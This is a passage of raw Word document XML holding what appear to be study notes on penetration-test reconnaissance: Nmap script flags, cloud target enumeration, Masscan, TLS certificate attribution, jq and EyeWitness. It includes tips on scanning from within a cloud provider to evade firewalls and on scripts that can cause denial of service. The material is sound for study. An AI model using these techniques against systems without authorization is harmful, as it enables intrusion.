                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nmap: SYN scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C8A241" w14:textId="77777777" w:rsidR="008540B1" w:rsidRDefault="008540B1" w:rsidP="008540B1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The Nmap version scan information is useful, but at a cost: It is slower than other scan types, and it will generate more network activity, potentially disclosing the attacker’s presence.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47CAE3DB" w14:textId="6B004E89" w:rsidR="008540B1" w:rsidRPr="008540B1" w:rsidRDefault="008540B1" w:rsidP="008540B1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Adding -sV tells Nmap to conduct a version scan, gathering information from open ports to interrogate the service and present more detail.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D9424B8" w14:textId="05D1CBC5" w:rsidR="008540B1" w:rsidRPr="006F5A04" w:rsidRDefault="008540B1" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="475190B8" w14:textId="256D26F3" w:rsidR="008540B1" w:rsidRPr="006F5A04" w:rsidRDefault="008540B1" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>60</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2CD359F9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="008540B1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Identify host information vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8C9FC9" w14:textId="6D3DF041" w:rsidR="008540B1" w:rsidRDefault="008540B1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-sC: Use default scripts to evaluate the target.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FB35AAD" w14:textId="5A859C77" w:rsidR="008540B1" w:rsidRDefault="008540B1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--script all: Runs all scripts against target (can lead to DoS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221C9DDB" w14:textId="09E0DD91" w:rsidR="008540B1" w:rsidRDefault="008540B1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--script-updatedb: update the NSE scripts</w:t>
            </w:r>
            <w:r w:rsidR="006168E2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (requires internet access)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D092909" w14:textId="6CF029E7" w:rsidR="006168E2" w:rsidRDefault="006168E2" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--script banner: Run the named script (banner) against the target(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FDCC95" w14:textId="23095952" w:rsidR="006168E2" w:rsidRDefault="006168E2" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>--script-help “http”</w:t>
            </w:r>
            <w:r w:rsidR="001756B5">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Get help for the named script(s) (use wildcard * alone for all scripts)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD811EB" w14:textId="7F15E287" w:rsidR="001756B5" w:rsidRDefault="001756B5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--script “http*”: Run all the scripts beginning with http against the target(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F5FC1C" w14:textId="24930E30" w:rsidR="008540B1" w:rsidRPr="006F5A04" w:rsidRDefault="001756B5" w:rsidP="001756B5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--script “smb”: Run all the scripts beginning with smb against the target(s).</w:t>
            </w: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3EBD1173" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00223952" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>65</w:t>
            </w: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3A592356" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="008E49D5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enumerating cloud targets introduces new challenges, such as impractical to scan large range of Ips and difficult to identify owner of a given target.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="594587DB" w14:textId="77777777" w:rsidR="008E49D5" w:rsidRDefault="008E49D5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cloud target enumeration also has new attacker opportunities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179586D2" w14:textId="77777777" w:rsidR="008E49D5" w:rsidRDefault="008E49D5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Less likely to be monitored and logged.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28CEEF6E" w14:textId="77777777" w:rsidR="008E49D5" w:rsidRDefault="008E49D5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Potential to bypass ACL filters.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="601DAE3A" w14:textId="786DF82C" w:rsidR="008E49D5" w:rsidRDefault="008E49D5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>May reveal information about non-cloud assets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B456A1" w14:textId="205A3160" w:rsidR="008E49D5" w:rsidRPr="006F5A04" w:rsidRDefault="008E49D5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud target enumeration should always be done using the same cloud provider. This improves performance and can often evade firewalls that permit access sourced within the cloud infrastructure. </w:t>
            </w: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015B3A2A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00551436" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>If you work with cloud systems, you’ll have to work with JSON.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17226C53" w14:textId="77777777" w:rsidR="00551436" w:rsidRDefault="00551436" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>JSON is an ascii-based format widely used by cloud providers. You can user grep/cut/awk sed to process JSON, but is not ideals.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E5094B8" w14:textId="2487221C" w:rsidR="00551436" w:rsidRDefault="00551436" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Straigtht forward use case: format JSON for easier reading.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F08F4EF" w14:textId="77777777" w:rsidR="00551436" w:rsidRDefault="00551436" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Advanced use case: Formant JSON for easier reading.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72456549" w14:textId="6F344EDB" w:rsidR="00551436" w:rsidRPr="006F5A04" w:rsidRDefault="00551436" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Advanced use case: perform functions on selected data in JSON.</w:t>
            </w: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5539A9D5" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00456D96" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Using reconnaissance, attacker udentifies likely cloud provider. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6945ACF0" w14:textId="77777777" w:rsidR="00456D96" w:rsidRDefault="00456D96" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DNS information, linked resources in website pages, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09654EF9" w14:textId="77777777" w:rsidR="00456D96" w:rsidRDefault="00456D96" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Builtwith.com summarizes service providers for a given site.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485FEEAA" w14:textId="77777777" w:rsidR="00456D96" w:rsidRDefault="00456D96" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attacker identifies IP range for provider, performs full scan.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D28A984" w14:textId="68009DE4" w:rsidR="00456D96" w:rsidRPr="006F5A04" w:rsidRDefault="00456D96" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Leverages scan results to identift other systems for target discovery.</w:t>
            </w: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Large Ranges: Masscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38DA3DC3" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00C479EE" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nmap is not ideal for scanning millions of IP addresses.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F1A2DF"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Masscan separates the SYN send from the ACK receive code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F8E40EE"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Sender can fire-and-forget.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2913BE42"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Receiver identidies open/closed from response.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CDACA09" w14:textId="178D32DA" w:rsidR="00C479EE" w:rsidRPr="006F5A04" w:rsidRDefault="00C479EE" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">By decoupling the 2 halves of the three-way shandshake, speed is greatly </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>improves</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>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Masscan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20CD3267" w14:textId="3524BCE8" w:rsidR="00303D06" w:rsidRDefault="00E563CB" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>With a list of TLS servers, attribution is performed using certificate details.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ECE6ED4" w14:textId="77777777" w:rsidR="00E563CB" w:rsidRDefault="00E563CB" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Masscan reveals a list of IP addresses listening to TCP/443.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79BB727B" w14:textId="10176E7F" w:rsidR="00E563CB" w:rsidRPr="006F5A04" w:rsidRDefault="00E563CB" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>We can connect to the service and retrieve the certificate details. Reveals the certificate common name (CN) attribute, often identifying a target organization’s domain name.</w:t>
            </w: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39E2A6C1" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00E563CB" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Scans a lists of TLS servers and collects certificate, cipher details.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD920E8" w14:textId="77777777" w:rsidR="00E563CB" w:rsidRDefault="00E563CB" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Fast, non-blocking, performant scanner.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76FE5323" w14:textId="39BE2685" w:rsidR="00E563CB" w:rsidRPr="006F5A04" w:rsidRDefault="00E563CB" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Saves results in JSON format.</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4871D8B0" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="007E6D76" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Saves the scan results into a JSON-formatted file. We can user the JQ utility to extract the desired information from the scan, even formatting it in a CSV file for use with other tools.</w:t>
            </w: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Scanners: EyeWitness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54F7453F" w14:textId="77777777" w:rsidR="007E6D76" w:rsidRDefault="007E6D76" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sometimes the results of a scan can be overwhelming. Eyewitness makes it easy to grab a screenshot of web, VNC, and RDP services. Scan the results visually to look for interesting targets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1500DD" w14:textId="77777777" w:rsidR="007E6D76" w:rsidRDefault="007E6D76" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can be very effective to sort through hundreds of different webistes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56A70C0F" w14:textId="77777777" w:rsidR="007E6D76" w:rsidRDefault="007E6D76" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Attackers and testers look for default pages, out-of-date servers, RDP servers that show domains, indexed web directories, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C442A0" w14:textId="77777777" w:rsidR="007E6D76" w:rsidRDefault="007E6D76" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Many vulnerabilities do not necessarily need an exploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AF737EA" w14:textId="4369191A" w:rsidR="007E6D76" w:rsidRPr="006F5A04" w:rsidRDefault="007E6D76" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
